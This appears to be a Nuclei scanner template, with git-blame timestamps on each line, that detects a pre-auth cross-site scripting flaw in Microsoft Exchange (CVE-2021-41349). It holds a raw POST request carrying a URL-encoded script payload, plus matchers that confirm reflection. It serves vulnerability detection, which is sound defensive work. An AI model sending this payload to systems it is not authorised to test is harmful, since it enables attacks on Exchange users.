2021-11-12 18:59:04 +00:00
|
|
|
id: CVE-2021-41349
|
2021-11-12 18:25:15 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
|
2021-11-12 18:59:04 +00:00
|
|
|
author: rootxharsh,iamnoooob
|
2021-11-12 18:25:15 +00:00
|
|
|
severity: medium
|
2022-03-07 18:40:20 +00:00
|
|
|
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
|
2021-11-12 18:59:04 +00:00
|
|
|
reference:
|
2022-03-07 15:43:02 +00:00
|
|
|
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
|
2021-11-12 18:59:04 +00:00
|
|
|
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
|
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349
|
2021-11-12 19:00:28 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.5
|
2021-11-12 19:00:28 +00:00
|
|
|
cve-id: CVE-2021-41349
|
2023-11-06 12:42:20 +00:00
|
|
|
epss-score: 0.84442
|
2023-11-16 10:31:49 +00:00
|
|
|
epss-percentile: 0.9817
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: microsoft
|
|
|
|
product: exchange_server
|
|
|
|
tags: cve,cve2021,xss,microsoft,exchange
|
2021-11-12 18:59:04 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-12 18:25:15 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /autodiscover/autodiscover.json HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2021-11-12 19:07:40 +00:00
|
|
|
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
|
2021-11-12 18:25:15 +00:00
|
|
|
|
2021-11-12 18:59:04 +00:00
|
|
|
matchers-condition: and
|
2021-11-12 18:25:15 +00:00
|
|
|
matchers:
|
2021-11-12 18:59:04 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-11-12 19:07:40 +00:00
|
|
|
- 'alert(document.domain);'
|
|
|
|
- 'a=""'
|
|
|
|
condition: and
|
2021-11-12 18:59:04 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'text/html'
|
|
|
|
|
2022-05-26 03:05:36 +00:00
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
negative: true
|
2022-05-26 03:05:36 +00:00
|
|
|
words:
|
|
|
|
- "A potentially dangerous Request.Form value was detected from the client"
|
|
|
|
|
2021-11-12 18:59:04 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2022-03-07 15:43:02 +00:00
|
|
|
- 500
|
2023-11-14 16:39:03 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100d850a0fb788ac1255e1614f9358448c99bcf6de4728dd103a79d23d2027da59002200799e092355c783129060cd93a71921f064bcf4990e3f0ac7084845ee361cb6e:922c64590222798bb761d5b6d8e72950
|